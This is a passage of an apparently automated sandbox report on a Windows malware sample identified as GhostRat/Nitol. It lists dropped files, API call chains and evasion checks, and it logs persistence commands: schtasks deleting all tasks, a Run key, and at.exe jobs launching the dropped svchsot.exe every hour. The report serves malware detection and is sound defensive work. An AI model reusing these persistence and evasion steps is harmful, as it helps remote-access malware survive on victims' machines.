          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: iertutil.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: srvcli.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: netutils.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: msvcp60.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: netapi32.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: samcli.dll
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeSection loaded: wtsapi32.dll
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00401301 IsBadReadPtr,LoadLibraryA,GetProcAddress,0_2_00401301
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00404620 push eax; ret 0_2_0040464E
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100699B0 push eax; ret 0_2_100699DE
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100FAA45 push edi; ret 0_2_100FAA46
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10026E51 push cs; ret 0_2_10026E52
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100699B0 push eax; ret 32_2_100699DE
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100FAA45 push edi; ret 32_2_100FAA46
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10026E51 push cs; ret 32_2_10026E52

          Persistence and Installation Behavior

          barindex
          Drops executables to the windows directory (C:\Windows) and starts them
          Source: unknownExecutable created and started: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to dropped file
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeFile created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /f
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10010E20 OpenSCManagerA,OpenServiceA,QueryServiceStatus,ControlService,Sleep,DeleteService,RegDeleteKeyA,OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,LockServiceDatabase,OpenSCManagerA,OpenServiceA,ControlService,CloseServiceHandle,OpenSCManagerA,OpenServiceA,LockServiceDatabase,ChangeServiceConfigA,UnlockServiceDatabase,CloseServiceHandle,CloseServiceHandle,Sleep,0_2_10010E20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run XXXXXX579E5A5B VVVVVVrr2unw==Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= auto
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000A660 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,0_2_1000A660
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100024100_2_10002410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1000241032_2_10002410
          Contains functionality to detect virtual machines (IN, VMware)
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001800 in eax, dx0_2_10001800
          Found stalling execution ending in API Sleep call
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeStalling execution: Execution stalls by calling Sleepgraph_0-19370
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,0_2_100108F0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: OpenSCManagerA,OutputDebugStringA,LocalAlloc,LocalAlloc,EnumServicesStatusA,LocalAlloc,lstrlen,LocalAlloc,OpenServiceA,LocalAlloc,QueryServiceConfigA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,LocalSize,LocalReAlloc,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,lstrlen,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,32_2_100108F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeWindow / User API: threadDelayed 1194Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeWindow / User API: threadDelayed 379Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeWindow / User API: threadDelayed 7127Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-19219
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-19396
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAPI coverage: 1.5 %
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100024100_2_10002410
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_1000241032_2_10002410
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388Thread sleep count: 1194 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388Thread sleep time: -214920000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7400Thread sleep count: 379 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388Thread sleep count: 7127 > 30Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exe TID: 7388Thread sleep time: -1282860000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,0_2_100014B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_10008880
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle,0_2_10009090
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,0_2_10008CE0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,0_2_100086B0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10008FD0 FindFirstFileA,FindClose,FindClose,0_2_10008FD0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008880 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,32_2_10008880
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10009090 FindFirstFileA,FindClose,CreateFileA,CloseHandle,32_2_10009090
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,32_2_10001A20
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,32_2_100014B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008CE0 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,32_2_10008CE0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_100086B0 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,32_2_100086B0
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeCode function: 32_2_10008FD0 FindFirstFileA,FindClose,FindClose,32_2_10008FD0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100084F0 GetLogicalDriveStringsA,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,lstrlen,GetDiskFreeSpaceExA,GetDriveTypeA,lstrlen,0_2_100084F0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001600 Sleep,GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatus,0_2_10001600
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeThread delayed: delay time: 180000Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeThread delayed: delay time: 180000Jump to behavior
          Source: ILQ18dgzMU.exe, 00000000.00000002.4082758555.000000000047E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-19979
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-19987
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-20003
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-20000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-19337
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeAPI call chain: ExitProcess graph end nodegraph_0-19679
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeAPI call chain: ExitProcess graph end node
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000F8D0 SendMessageA,SystemParametersInfoA,Sleep,SystemParametersInfoA,SendMessageA,SystemParametersInfoA,SendMessageA,BlockInput,BlockInput,0_2_1000F8D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,0_2_100018A0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00401301 IsBadReadPtr,LoadLibraryA,GetProcAddress,0_2_00401301
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,0_2_00401000
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000F9D0 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,0_2_1000F9D0
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_1000F9D0 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,0_2_1000F9D0
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn * /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config Schedule start= autoJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net start "Task Scheduler"Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 0:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 1:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 2:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 3:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 4:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 5:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 6:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 7:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 8:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 9:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 10:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 11:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 12:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 13:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 14:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 15:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 16:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 17:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 18:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 19:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 20:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 21:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 22:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 23:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\at.exe At 24:00 C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 start "Task Scheduler"Jump to behavior
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10026D20 cpuid 0_2_10026D20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceA,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,0_2_10001A20
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_10007200 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_10007200
          Source: C:\Users\user\Desktop\ILQ18dgzMU.exeCode function: 0_2_00401D21 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,0_2_00401D21
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
          Source: ILQ18dgzMU.exe, ILQ18dgzMU.exe, 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, svchsot.exe, 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe

          Stealing of Sensitive Information

          barindex
          Yara detected GhostRat
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Yara detected Nitol
          Source: Yara matchFile source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ILQ18dgzMU.exe PID: 7384, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 8024, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected GhostRat
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 00000000.00000002.4082870617.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3947674150.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.3090838933.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Yara detected Nitol
          Source: Yara matchFile source: 00000020.00000002.1733553944.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ILQ18dgzMU.exe PID: 7384, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 8024, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts2
          Native API          		1
          Scripting          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		21
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts2
          Command and Scripting Interpreter          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Obfuscated Files or Information          		LSASS Memory1
          Account Discovery          		Remote Desktop Protocol3
          Clipboard Data          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Scheduled Task/Job          		12
          Windows Service          		12
          Windows Service          		1
          DLL Side-Loading          		Security Account Manager1
          System Service Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts13
          Service Execution          		1
          Scheduled Task/Job          		12
          Process Injection          		12
          Masquerading          		NTDS2
          File and Directory Discovery          		Distributed Component Object ModelInput Capture1
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchd1
          Registry Run Keys / Startup Folder          		1
          Scheduled Task/Job          		121
          Virtualization/Sandbox Evasion          		LSA Secrets15
          System Information Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
          Registry Run Keys / Startup Folder          		1
          Access Token Manipulation          		Cached Domain Credentials241
          Security Software Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Process Injection          		DCSync121
          Virtualization/Sandbox Evasion          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Indicator Removal          		Proc Filesystem12
          Process Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
          Application Window Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
